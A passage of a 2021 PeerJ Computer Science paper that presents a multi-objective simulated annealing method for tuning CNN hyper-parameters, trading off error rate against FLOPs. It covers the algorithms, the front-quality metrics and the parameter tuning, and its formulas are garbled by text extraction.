et al., 1998; Goodfellow, Bengio & Courville, 2016). Excellent results obtained for object classification problems in ILSVRC (IMAGENET Large Scale Vision Recognition Competition) accelerated the use of these networks in other vision related problems like face and activity recognition (Russakovsky et al., 2015). With the availability of increasing computational resources, winning architectures of the competition, aka state-of-the-art models, became deeper and deeper resulting in very high classification accuracy rates. In 2014, ILSVRC winner model, VGGNet (Simonyan & Zisserman, 2014), had 19 layers, but the following years’ state-of-the-art models, for example, ResNet (He et al., 2016) and DenseNet (Huang et al., 2017) had over 100 layers. How to cite this article Gülcü A, Kuş Z. 2021. Multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks. PeerJ Comput. Sci. 7:e338 DOI 10.7717/peerj-cs.338 Submitted 19 June 2020 Accepted 26 November 2020 Published 4 January 2021 Corresponding author Ayla Gülcü, agulcu@fsm.edu.tr Academic editor Andrea Schaerf Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.338 Copyright 2021 Gülcü and Kuş Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.338 mailto:agulcu@�fsm.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.338 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Finding a CNN architecture that generates high quality results for a given problem is a challenging process which requires a systematic approach rather than by trial and error. Moreover, trying all possible parameter combinations is infeasible due to the size of the parameter space. The problem of automatically designing CNN architectures and selecting the best set of hyper-parameters for the network has drawn attention of many researchers over many years. It is shown in many studies that using algorithmic approaches rather than manual tuning process results in simpler networks with improved classification performance (Bergstra & Bengio, 2012; Real et al., 2017; Ma et al., 2020). This automated neural architecture search (NAS) and hyper-parameter optimization is not only limited to CNNs, but also applicable for both feed-forward and Recurrent Neural Networks (RNNs). For example, the architectures and the hyper-parameters of Long Short-Term Memory networks which are the most widely-used variants of RNNs can be optimized with the proposed approaches. Hyper-parameter optimization (HPO) is the most basic task in automated machine learning (AutoML) which reduces the human effort by automatizing the labor intensive hyper-parameter tuning process. With HPO, a wider solution space can be searched, which in turn may yield in better performing configurations for the problem at hand (for a detailed view on HPO, please refer to Feurer & Hutter, 2019). On the other hand, NAS is a specialized hyper-parameter optimization problem which involves discrete hyper-parameters as in HPO, but with an additional structure that can be captured with a directed acyclic graph (DAG) (Li & Talwalkar, 2020). In NAS methods, the search space for designing an entire architecture contains too many nodes and edges; therefore it is usually defined over smaller building blocks called cells which drastically reduce the search space. A new architecture is then built by stacking these cells in a predefined manner. The number of the cells and the types of those cells along with the types of connections allowed among those cells are among important design decisions in NAS studies (Elsken, Metzen & Hutter, 2019). Random Search (RS) (Bergstra & Bengio, 2012), Bayesian Optimization (BO) approaches (Hoffman & Shahriari, 2014) and population-based optimization algorithms such as Genetic Algorithms (GAs) (Holland, 1992), Evolutionary Algorithms (EAs) (Back, 1996) and Particle Swarm Optimization (PSO) (Eberhart & Kennedy, 1995) have been successfully used to select the best CNN hyper-parameters. Especially, EAs are among the most widely used techniques for HPO. In (Real et al., 2017; Suganuma, Shirakawa & Nagao, 2017; Elsken, Metzen & Hutter, 2018) EAs have been used for optimizing the network architecture and gradient-based methods have been used for optimizing the network weights. Single-stage algorithms like Simulated Annealing (SA) and its variants have also proven to be effective for CNN HPO problems (Gülcü & Kuş, 2020). NAS has become a very important research topic especially after it has obtained competitive performance on the CIFAR-10 and Penn Treebank benchmarks with a search strategy based on reinforcement learning (Zoph & Le, 2016). However, the computational cost of this approach led the researchers to seek other methods with less computational requirement but with higher classification performance. Relaxation-based methods (Liu, Simonyan & Yang, 2018) try to improve the computational efficiency of Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 2/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ NAS approaches, but these approaches still require huge computational resources. EAs provide a good alternative for NAS, but they still suffer from the large computational requirement (Liu et al., 2018). On the other hand, it is shown that EA-based NAS methods that use limited search budgets result in poor classification performance (Xie & Yuille, 2017; Sun et al., 2019a). Therefore, recent HPO and NAS approaches not only consider the error rate, but also the complexity brought by the proposed configuration or architecture. A single-objective optimization problem involves a single objective function, and usually results in a single solution. However, in many real-life problems, there are multiple objectives to be considered, and these objectives usually conflict with each other. Optimizing a solution with respect to one objective often results in unacceptable results with respect to the other objectives. For example, achieving a network with a low error rate usually comes with a huge cost of computational complexity. Thus, a perfect multi- objective solution that simultaneously optimizes each objective function is almost impossible. A minimization multi-objective optimization problem with K objectives is defined as follows (Konak, Coit & Smith, 2006): Given an n-dimensional decision variable vector x ¼ x1;::;xnf g in the solution space X , find a vector x� that minimizes a given set of K objective functions z x�ð Þ¼ z1 x�ð Þ;::;zK x�ð Þf g. The solution space X is generally restricted by a series of constraints and bounds on the decision variables. There are two general solution approaches to Multi-Objective Optimization (MOO). One is to combine all of the objective functions into a single composite function using methods like weighted sum method, but in practice it is very difficult to select the proper weights that will reflect the decision maker’s preferences. The second approach is to provide the decision maker a set of solutions that are non-dominated with respect to each other from which she/he can choose one. A reasonable solution to a multi-objective problem is to find a set of solutions, each of which satisfies the objectives at an acceptable level without being dominated by any other solution. A feasible solution x is said to dominate another feasible solution y; x � y, if and only if, zi xð Þzi yð Þ for i ¼ 1;::;K and zj xð Þ < zj yð Þ for at least one objective function j. A solution is said to be Pareto optimal if it is not dominated by any other solution in the solution space. Improving a Pareto optimal solution with respect to one objective is impossible without worsening at least one of the other objectives. The set of all feasible non-dominated solutions in the solution space is referred to as the Pareto-optimal set, and for a given Pareto-optimal set, the corresponding objective function values in the objective space are called the Pareto- front. In multi-objective optimization, there are two tasks to be completed, where the first task being the optimization task for finding the Pareto-optimal set, and the second task being a decision making task for choosing a single most preferred solution from that set which involves a human interaction. Generating the Pareto-optimal set is often infeasible, and the methods like evolutionary algorithms (EAs) usually do not guarantee to identify the optimal front, but try to provide a good approximation; that is, a set of solutions whose objective vectors are not too far away from the optimal objective vectors. Since the Pareto-optimal set is unknown, comparing the approximations generated by Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 3/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ different methods is a difficult task requiring appropriate quality measures to be used. There are several measures in the literature each of which reflects a different aspect of the quality such as the closeness to the optimal front and the diversity of the solutions in the front (please refer to Zitzler et al., 2003 for a detailed review on MOO performance assessment). Multi-objective EA-based approaches are among the most widely-used methods for CNN MOO problems. In these studies, high classification performance is considered as the first objective, and the low computational requirement is considered as the second objective. It is aimed to generate networks that are satisfactory with respect to both of these objectives. (Kim et al., 2017) try to optimize the deep neural networks in terms of two competing objectives, speed and accuracy using GAs. In their study, LeNet (LeCun et al., 1998) is chosen as the initial architecture, and the performance of the initial solution is improved considering two objectives. Test results based on the MNIST (LeCun et al., 1998), CIFAR-10 (Krizhevsky & Hinton, 2009) and Drowsiness Recognition (Weng, Lai & Lai, 2016) show that the proposed approach yields in models with better accuracy and speed than the initial model. In Elsken, Metzen & Hutter (2018), Lamarckian Evolution and multi-objective EA is used to generate computationally efficient CNNs with high classification accuracy values. Based on the results on CIFAR-10 dataset, the proposed approach achieves competitive results with other multi-objective approaches. Lu et al. (2019a) present another multi-objective EA which they call NSGANet that try to optimize both error rate and the number of Floating Point Operations (FLOPs). According to the test results obtained using CIFAR-10, CIFAR-100 and human chest X-rays data sets, the proposed approach increase the search efficiency. Same objectives are also adopted in the study of Wang et al. (2019) in which PSO is used to fine tune the hyper-parameters. In the study, best models are compared to DenseNet-121 in terms of both objectives. The results based on CIFAR-10 dataset state that the models generated by the proposed approach dominate the base model. In this study, we present a single-stage HPO method to optimize the hyper-parameters of CNNs for object recognition problems considering two competing objectives, classification accuracy and the computational complexity which is best measured in terms of FLOPs. For this bi-criteria optimization problem, we use a Multi-Objective Simulated Annealing (MOSA) algorithm with the aim of generating high quality fronts. CIFAR-10 dataset is selected as the benchmark, and the final fronts generated by the proposed algorithm is compared to the fronts generated by a single-objective variant of the same algorithm with respect to several front metrics such as generational distance, spacing and spread. According to the results obtained using these front evaluation metrics, it can be concluded that the MOSA algorithm is able to search the objective space more effectively than the SA method. After performing longer training on the selected configurations, the results again reveal that the MOSA performs better than the SA under multi-objective setting. The MOSA configurations are also compared to human engineered and search generated configurations. When both test accuracy and the complexity are taken into account, it is shown that the network configurations generated by the MOSA are Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 4/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ not dominated by those configurations, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. MATERIALS AND METHODS In “CNNs—An Overview”, we remind key concepts of CNNs and multi-objective aspects of CNNs. In “SA Algorithm”, we first describe a single-objective SA algorithm, and then in “MOSA Algorithm”, we give some details about the MOSA algorithm that discriminate it from the SA such as the acceptance criterion and the archive maintenance mechanism. In “Performance Evaluation Criteria” we elaborate the performance evaluation metrics used in this study to compare different Pareto fronts in a quantitative manner. CNNs—an overview Neural Networks (NNs) receive an input and transform it through a series of hidden layers each of which is made up of a set of neurons that receives some inputs, performs a dot product followed with a non-linearity. In any layer, each neuron is fully connected to all neurons in the previous layer, that is why Regular NNs don’t scale well to inputs in the form of images. Similarly, CNNs are made up of neurons that have learnable weights and biases, and the whole network still expresses a single differentiable score function. In general, CNNs assume that the inputs are images, and they constrain the architecture in a more sensible way. There are three types of layers in CNNs: Convolution Layer, Pooling Layer and Fully Connected Layer. A convolution layer is a fundamental component of a CNN architecture that performs feature extraction through a combination of linear and nonlinear operations, that is, convolution operation and activation function. Convolution is specialized type of linear operation used for feature extraction with the help of a small array of numbers called filter or kernel navigating over the input tensor. At each location of the input tensor, an element-wise product between the elements of the filter and the input is applied. These products are then summed to obtain the output value in the corresponding position of the output tensor which is called a feature map. This operation is repeated using multiple kernels resulting in multiple number of feature maps at a single layer. Figure 1 illustrates a CNN with two convolution layers each of which contains different number of filters with differing size. In the figure, images of size 96 × 96 × 3 are fed into the CNN where the first two dimensions denote the width and height of the image, and the third dimension denotes the number of channels which is 3 for a color image. As can be seen in Fig. 2 which illustrates the convolution process, the number of channels (depth) of the filters always equals to the number of channels of the input image, but the size and the number of those filters are among the hyper-parameters whose values should be selected carefully. The convolution process can be speed up by using dimension reduction adjusting the stride value. If the stride value takes a value other than 1, then the filter skips the input by this amount. If input size reduction is not desired, padding is used. In the pooling layer, size reduction is done in the same way as in the convolution layer with one difference is that the number of channels remains unchanged. There are two main types of Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 5/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ pooling methods: max and average pooling. Pooling type, the size and the stride of the filter are among the hyper-parameters in a given network. In the example CNN in Fig. 1, the first convolution layer includes 32 filters each with a size of 5 × 5 × 5, and after the first convolution operation, linear structure is transformed into a non-linear structure using ReLU activation function. After the pooling layer, input weight and height is reduced to 22 × 22, but the depth is increased to 32. After the second convolution and pooling operations, input width and height is reduced even more. Strive method is proposed as an alternative to the pooling method (Springenberg et al., 2014). A strive layer is a kind of convolution layer with 3 × 3 or 2 × 2 filter sizes with a stride of 2. Filters in this layer do not have weights to learn, because, only size reduction is applied. After the convolution and pooling operations, a flattening operation is applied to transform all the feature maps in the final layer into a one-dimensional vector which is then fed to the fully connected Figure 1 An example CNN architecture. Full-size DOI: 10.7717/peerj-cs.338/fig-1 Figure 2 Convolution process. Full-size DOI: 10.7717/peerj-cs.338/fig-2 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 6/27 http://dx.doi.org/10.7717/peerj-cs.338/fig-1 http://dx.doi.org/10.7717/peerj-cs.338/fig-2 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ layer where classification results are obtained. There might be multiple fully connected layers in a CNN; however, the output size of the last fully connected layer should match the number of classes in the problem. For a given input, a classification score is computed for each class and the input is assigned to the class with the highest score. Based on the prediction accuracy, an error is computed which is then used to update the weights in the network. This process is repeated until a desired error rate is achieved. For a detailed review on the topic please refer to (Goodfellow, Bengio & Courville, 2016). Hyper-parameters like the total number of layers, the number and size of the filters at each layer along with filter related parameters like stride and padding define a CNN configuration or an architecture. On the other hand, total number of weights in all of the layers of a CNN defines the size or the number of parameters of that network. The size of a CNN is calculated differently for convolution and fully connected layers. The number of parameters in a convolution layer equals to d �m�nð Þþ1ð Þ�k , where d is the number of input feature maps, and m and n are the filter width and height, respectively (1 is added because of the bias term for each filter), and k is the number of output feature maps. The number of parameters in a fully connected equals to cþ1ð Þ�p, where c is the number of input nodes and p is the number of output nodes. SA algorithm Simulated Annealing (SA) uses an adaptation of the Metropolis algorithm to accept non-improving moves based on a probability (Kirkpatrick, Gelatt & Vecchi, 1983). In a single-objective SA, a new solution, X′, is selected within the neighborhood of current solution X, where the neighborhood of X is defined as all the solutions that can be reached by a single move from X. The moves that can be performed in a SA are defined based on the representation used to encode a feasible solution. Solution representation, on the other hand, is highly dependent on the problem domain. If the objective function value of X′ is smaller than X (for a minimization problem), then X′ is accepted. If X′ is worse than X, then it is accepted with a probability, pacc,which is calculated based on the worsening amount and the current temperature of the system as, pacc ¼ min 1; exp �DF=Tcurð Þf g where DF is the worsening amount in the objective function and Tcur is the current temperature. If the temperature is high, then the probability of accepting a worsening move would be higher than the probability with a lower temperature. In general, the system is initiated with a high temperature to allow exploration during initial steps. As shown in the SA pseudo-code below, after a certain number of solutions are visited at the current temperature level which is defined by the parameter nbr inner iter, the temperature is lowered gradually according to a predefined annealing scheme. Geometric cooling that uses a decay factor smaller than 1 is the most widely used cooling scheme in SA. At each outer iteration, Tcur is reduced to ensure the convergence of the algorithm, because the probability of accepting worsening moves drops as Tcur reduces. The total number of solutions visited during a run of a SA is defined as nbr out iter �nbr inner iter. However, the number of outer iterations is not always fixed before the start of the algorithm. A minimum temperature level, or a minimum objective function value can be defined as the stopping criterion. Initial Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 7/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ temperature, Tinit, cooling rate (if geometric cooling is employed) and the final temperature, Tfinal are important parameters that should be selected carefully. In this study, the SA algorithm considers only one objective which is the error rate, and it accepts a new solution X′ only if it is better than current solution X with respect to this single objective value. However, if X and X′ have the same error rate, then the SA selects the one with the smaller number of FLOPs. The composite move used to generate X′ is defined in “Local Moves”. In order to define Tinit, we use a real time initial temperature selection strategy (Smith, Everson & Fieldsend, 2004). In this strategy, pacc is not calculated using the formula pacc ¼ min 1; exp �DF=Tcurð Þf g. Instead, a fixed initial probability value which is recommended as 0.5 is defined for accepting the worsening moves. Then, Tinit is calculated as � DFave= ln paccð Þð Þð Þ, where DFave is the average worsening penalty amount which is calculated executing a short “burn-in” period. A similar real time temperature adjustment approach is also used to define Tfinal. In this study, the total iteration budget defines the SA stopping criterion, and the number of inner and outer iterations are defined according to this iteration budget and the cooling scheme. MOSA algorithm There are many types of MOSA algorithms in the literature, and basically, there are two main differences between multi-objective and single-objective SA algorithms. The first difference is the design of the acceptance rule, and second one is the maintenance of an external archive of non-dominated solutions which will eventually yield an approximation of the Pareto front. Let zk Xð Þ for k 2 1; 2; ::; Kf g be the value of the kth objective function of a solution X. If a new solution X0 yields in objective function values that are superior to X in terms of all of the objectives; that is, Dzk ¼ zk X0ð Þ� zk Xð Þ Algorithm 1 SA init sa params Tinit; nbr out iter; nbr inner iterð Þ Tcur Tinit for counter 0 to nbr out iter do for inner counter 0 to nbr inner iter do X0 SelectFromNeighbor Xð Þ if DF ¼ F X0ð Þ�F Xð Þð Þ� 0 then X X0 else if prnd � exp �DF=Tcurð Þthen X X0 else continue with X end end Tcur Tcur�cool ratio end Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 8/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ and Dzk � 0; k 2 1; 2f g assuming the two objectives are to be minimized, then it is always accepted. Otherwise, probabilistic acceptance rules as discussed in “SA Algorithm”. are used, but before this, multiple objective values should be combined into a single objective value. There are several approaches to combine all objective function values into a single value. (Ulungu et al., 1999) use a criterion scalarizing function which takes the weighted sum of the objective functions. Czyzżak & Jaszkiewicz (1998) use a diversified set of weights to obtain a diverse set of solutions in the final front in their SA-based algorithm which they call Pareto Simulated Annealing (PSA). Suppapitnarm et al. (2000) propose another MOSA, which they call SMOSA that suggests maintaining different temperatures, one for each objective. In the study a “return-to-base” strategy which restarts the search from a random archive solution is introduced. In dominance-based acceptance rules, X and X0 are compared with respect to the dominance relation. X is said to dominate X0 which is denoted as X � X0,if it is better than X0 in at least one objective and it is not worse than X0 in all of the other objectives. If at any iteration, X � X0 then, X0 is accepted with a probability which is also computed according to the domination status of the solutions. Suman (2004) proposes a Pareto Domination-Based MOSA which uses the Algorithm 2 MOSA init mosa params Tinit; nbr out iter; nbr inner iterð Þ Tcur Tinit for counter 0 to nbr out iter do for inner counter 0 to nbr inner iter do X0 SelectFromNeighbor Xð Þ if X � X0 // current dominates new then if prnd � exp �DF=Tcurð Þthen X X0 else if X0 � a; a 2 A then // an archive solution is dominated by new X X0 updateArchive X0ð Þ elseif a � X0; a 2 A then == an archive solution dominates new a� selectRandomArchiveSolutionðÞ X select a�; X0; Xð Þ == ða � and X0Þ or ða� and XÞ competes else ==new does not dominate or is not dominated by any archive solution X X0 updateArchive X0ð Þ end end Tcur Tcur�cool ratio end Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 9/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ current domination status of a solution to compute its acceptance probability. The acceptance probability of a solution is determined by the number of solutions in the current front dominating it. Bandyopadhyay et al. (2008) proposes Archive-based Multi-objective Simulated Annealing (AMOSA) which again uses a dominance-based acceptance rule. A detailed survey on single-objective and multi-objective SA can be found in Suman & Kumar (2006). The MOSA algorithm proposed in this study iterates in a similar fashion as the single-objective SA algorithm. However, there are now two objective values to take into consideration while moving from X to X0, where the first objective being the number of FLOPs required by the network, and the second being the error rate achieved by the network. Criterion scalarizing rules can be used to combine the two objective values into one, but this method requires both objective values to be in the same scale and proper weights to be defined for each objective. On the other hand, probability scalarizing rules calculate the acceptance probability of X0 for each objective individually, then a decision rule is applied to aggregate these probabilities such as taking the minimum, maximum or the product of these probabilities. As different probabilities are evaluated for each objective, a different temperature should be maintained for each objective in this approach. Due to the difficulties mentioned above, we adopt the Smith’s Pareto dominance rule (Smith et al., 2008) in our MOSA algorithm. Starting from the first iteration, all non-dominated solutions encountered during the search are collected in an external archive, A, which is updated whenever a new solution is accepted. The state of A is expected to improve as the algorithm iterates, and archive solutions in the final iteration form the Pareto front which is presented to the decision maker. As shown in the MOSA pseudo-code below, as the algorithm iterates from X to X0, if X � X0 (X dominates X0), then X0 is accepted based on Smith’s Pareto dominance rule which calculates the acceptance probability of a given solution by comparing it with the current archive which contains potentially Pareto-optimal set of solutions. Smith’s rule uses a difference in the energy level, DF, to compare two solutions with respect to all objectives as follows: Let A denote the current potentially Pareto optimal set and ~A denote the union of this set and two competing solutions, ~A ¼ A[X [X0, then DF ¼f1= ~A �� g � F X0ð Þj j� F Xð Þj jf g, where F Xð Þ denotes the solutions in A that dominate X plus 1. The probability of accepting X0 is then computed as pacc ¼ exp �DF=Tcurð Þ, where the only difference with a single-objective version is the calculation of DF. In this approach, only one temperature is maintained regardless of the number of objectives. In a multi-objective version of SA algorithm, archive maintenance related rules should also be defined. If X 6�X0 (X does not dominate X0), then X0 becomes a candidate for being a member of the archive. This is determined as follows: If X0 dominates any solution in A, then X0 is accepted and the archive is updated by inserting X0 and removing all the solutions dominated by it. If X 6�X0 but there is a solution a 2 A dominating X0, then no archive update is performed and the current iteration is completed either by accepting X0, a or X as the current solution. If X0 � X, then a and X0 compete for being selected as the current solution according to the probability calculated with the same rule described above. Here, a represents a random Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 10/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ archive solution dominating X0. Continuing the search process with a previously visited archive solution is known as return-to-base strategy. If X 6�X0 and X06�X, then first these two solutions compete, and then the winning solution competes with a according to the same probabilistic acceptance rule. If X 6�X0 and there is no solution a 2 A that dominates X0, and X0 does not dominate any solution a 2 A, then X0 is accepted and inserted into the archive. As the archive is updated by removing all dominated solutions, the size of the archive does not grow very large. Selection of other MOSA parameters such as Tinit, Tfinal, cooling rate and also the number of inner and outer iterations are given in detail in Section “MOSA parameter tuning”. Performance evaluation criteria In multi-objective optimization problems, final fronts are evaluated according to two performance criteria: (i) Closeness to the Pareto-optimal front and, (ii) Diversity of the solutions along the front (Zitzler, Deb & Thiele, 2000; Deb, 2001). Generational Distance (GD) is the most-widely used metric to examine the closeness of the final front to Pareto-optimal front (Van Veldhuizen & Lamont, 2000). In order to measure the diversity which is comprised of two components, namely distribution and spread, two metrics, spacing and maximum spread are used. Spacing evaluates the relative distance among the solutions, whereas spread evaluates the range of the objective function values. GD metric requires a Pareto-optimal front in order to compare any two fronts. Since this optimal front is not known in advance, it is approximated by an aggregate front, A�, which is formed by combining all solutions in the two fronts. Then, the amount of improvement achieved in each front is measured with respect to this aggregate front. GD for a given front is calculated as given in Eq. (1), where di is the Euclidean distance between the solution i 2 A and the closest solution k 2 A�. In Eq. (2), Pmax and Emax denote the maximum objective values, whereas P� and E� denote the minimum objective function values observed in A�. For this GD metric, smaller the better. GD Að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiP i2A d 2 i p Aj j (1) di ¼ min k2A� ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 2 Pi �Pk Pmax �P� � �2 þ Ei �Ek Emax �E� � �2 !vuut (2) Zitzler’s spread metric which is computed as in Eq. (3) is used to measure the extent of the fronts. This metric simply calculates Euclidean distance between the extreme solutions in a given front. If a front A includes all the extreme solutions in A�, then this front takes a value of 1 according to this metric. S Að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 2 max i2A Pi �min i2A Pi Pmax �P� !2 þ max i2A Ei �min i2A Ei Emax �E� !20@ 1 A vuuut (3) Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 11/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Spacing metric (Schott, 1995) is used to measure the diversity along a given front. For each solution, distance to its closest neighbor is calculated as shown in Eq. (4). Then, the spacing metric is calculated as the standard deviation of these distances as shown in Eq. (5), where �d is the average distance value. If the distance between the closest solutions are distributed equally, then the value of this metric approaches to zero which is the desired condition. di ¼ min k2A^k6¼i Pi �Pkj j max j2A Pj �min j2A Pj þ Ei �Ekj j max j2A Ej �min j2A Ej 0 @ 1 A; for i 2 A (4) Sp Að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 Aj j X i2A di � �d � �2s (5) RESULTS Implementation details Solution representation and the search space Solutions can be represented with either block (Ma et al., 2020) or layer structure (Yamasaki, Honma & Aizawa, 2017; Sun et al., 2019b). In this study, we adopted the block structure with variable length representation; where the solutions are allowed to expand or shrink dynamically. A new solution is generated by repeating a certain number of convolution and fully connected blocks. A convolution block is composed of a convolution layer (CONV), activation function (ACT), batch normalization (BN), subsampling method (SUBS) and a dropout function (DROP). A fully connected block is composed of a fully connected layer (FC), activation function, batch normalization and a dropout function. This structure can be represented as: CONV ! ACT ! BNð Þ�NC !½ SUBS ! DROPð Þ� �NCB ! FC ! ACT ! BN ! DROPð Þ½ � �NFB, where #Conv denotes the number of number of convolution layers in a convolution block, NCB denotes the number of convolution blocks, and NFB denotes and the number of fully connected blocks. We adopted the same dictionary structure given in (Ma et al., 2020) to represent a solution which is given below: Conv : ks; kc; p; s; af g#ConvN¼1 ; Pool : ksp; sp; pt; dp � � NCB M¼1þ uf ; df ; af � NFB K¼1 n o We adopted the same hyper-parameters as in (Gülcü & Kuş, 2020), and the full name of the hyper-parameters whose abbreviations are given in the dictionary representation are given in Table 1 along with their type and value ranges. An example solution that uses the dictionary representation is given below (please refer to Table 1 for the abbreviations): {{NCB: 2, NFB: 1}, {"Conv_Block_1": {"Conv" : {#Conv: 2, ks: 5, kc: 32, p: SAME, s : 1, a: relu}, "Pool" : {ksp: 3, sp: 2, pt: MAX, dp 0.2 }}, "Conv_Block_2" : {"Conv" : {#Conv: 3, ks: 3, kc: 64, p: SAME, s : 1, a: relu}, "Pool" : {ksp: 3, sp: 2, pt: MAX, dp: 0.4}}} + "Fully_Block_1" : {uf: 128, df: 0.5, af: relu}}. Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 12/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Local moves MOSA algorithm starts by taking VGGNet (Simonyan & Zisserman, 2015) as the initial solution, and at any iteration, a new solution is created from the current solution by modifying the convolution and fully connected block hyper-parameters as follows: Step1: add a new convolution block with a probability p which takes a value of 0.0625 initially, and increases by 1.4 times at every 50 iterations. A newly added block inherits all the hyper-parameters from the preceding block. Step 2: select the subsampling method, pooling or strive, with equal probabilities. Step 3: start from the first convolution block, modify each block as follows: if #Conv < maximum allowed layer count, then, add a new convolution layer with a p of 0.8; otherwise, delete the last convolution layer with a p of 0.2 modify the convolution layer hyper-parameters with a p of 0.5. If it is decided to be modified, then only one hyper-parameter which is selected randomly is modified. Since the same layer hyper-parameters are used within the same block (as in the VGGNet architecture), this selection affects all the layers in that block. Step 4: add a new fully connected block in a similar fashion to adding a new convolution block. Table 1 Hyper-parameters to be optimized, their value types and ranges. Hyper-parameter Abbreviation Value types Value ranges Convolution (Conv) Filter size ks Numeric 3, 5, 7 Filter count kc Numeric 32, 64, 96, 128, 160, 192, 224, 256 Padding p Categorical SAME** Stride s Numeric 1** Activation function f Categorical ReLU, Leaky-ReLU, Elu Subsampling method – Categorical Pooling, Strive Pooling (Pool)* Filter Size ksp Numeric 2, 3 Stride sp Numeric 2** Type pt Categorical MAX, AVG Dropout rate dp Numeric 0.3, 0.4, 0.5 Strive* Strive Filter Size kss Numeric 2, 3 Padding ps Categorical Valid** Stride ss Numeric 2** Fully Connected Number of units uf Numeric 128, 256, 512 Dropout rate df Numeric 0.3, 0.4, 0.5 Activation function af Categorical ReLU, Leaky-ReLU, Elu #Convolutional layers #Conv Numeric 2, 3, 4 #Convolutional blocks NCB Numeric 2, 4 #Fully connected layers NFB Numeric 0, 2 Notes: * Conditioned on subsampling method. ** Fixed values. Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 13/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Step 5: start from the first fully connected block, modify only one random hyper- parameter with a p of 0.5 as in the convolution block. We have observed during the preliminary experiments that the approach of adding a new convolution block with an initial probability of 0.0625, and increasing this probability by 1.4 times at every 50 iterations, enabled the search reach 4-block networks around iteration number 325. With this approach, the probability of adding a new block is increased to 0.24 at the end of the 200th iteration; and at the end of 300th iteration, it became 0.46 allowing the network to grow with roughly 50% probability. If we had kept this probability constant, 4-block networks would have been explored for only a few iterations towards the end of the search process. Experimental setup MOSA parameter tuning In our study, the MOSA algorithm adopts a real time initial temperature selection strategy in which the worsening moves are accepted with an initial probability, pacc, of 0.5. Tinit is then calculated as Tinit ¼� DFave= ln paccð Þð Þð Þ. Average initial worsening penalty amount, DFave, is approximated executing a short “burn-in” period in which worsening moves as well as improving ones are all accepted. We run a burn-in period with 100 iterations and 39 of them resulted in worsening solutions. In Table 2, some information regarding only a few of those iterations are given. In the table, F Xð Þ denotes the solutions in A that dominate X plus 1, Aj j denotes the size of the archive, F X0ð Þ�F Xð Þ denotes the worsening amount in terms of domination count and DF denotes the objective value calculated as DF ¼f1= ~A �� g � F X0ð Þj j� F Xð Þj jf g, where ~A�� equals Aj jþ2. The average Aj jvalue obtained in this burn-in period is used to calculate DFave. This period results in a DFave value of 0.40 which also gives a Tinit value of 0.577. We adopt a similar temperature adjustment approach to determine Tfinal value, where in this case we assumed a F X0ð Þ�F Xð Þ value of at most 1 to be accepted with the same probability. In order to calculate Tfinal, final front size needs to be approximated, and a value of 10 for the final front size seemed to be reasonable according to preliminary experiments, and Tfinal is calculated as 0.12. In this study, the MOSA algorithm is allowed to run for a number of iterations defined by the iteration budget of 500, which means that at most 500 solutions are created during a single run. The amount of this total iteration budget to be allocated in outer and inner iterations is determined by the cooling rate parameter. We tested for several cooling rate values keeping the total number of iterations at 250 due to large computational times. Table 3 shows the number of outer and inner iterations calculated for different cooling rate values under the same budget and temperature values. Based on these iteration numbers, we selected cooling rate values of 0.95, 0.90 and 0.85 for the parameter tuning process. We allowed the MOSA algorithm run for 3 times for each of those cooling rate values using different random number seeds. The fronts obtained under each cooling rate value for three runs are given in Fig. 3. As can be seen in the figure, three Pareto fronts are obtained for each cooling rate value. Although one can notice that there is no difference among the fronts formed with different cooling rate values visually, we applied Gülcü and Kuş (2021), 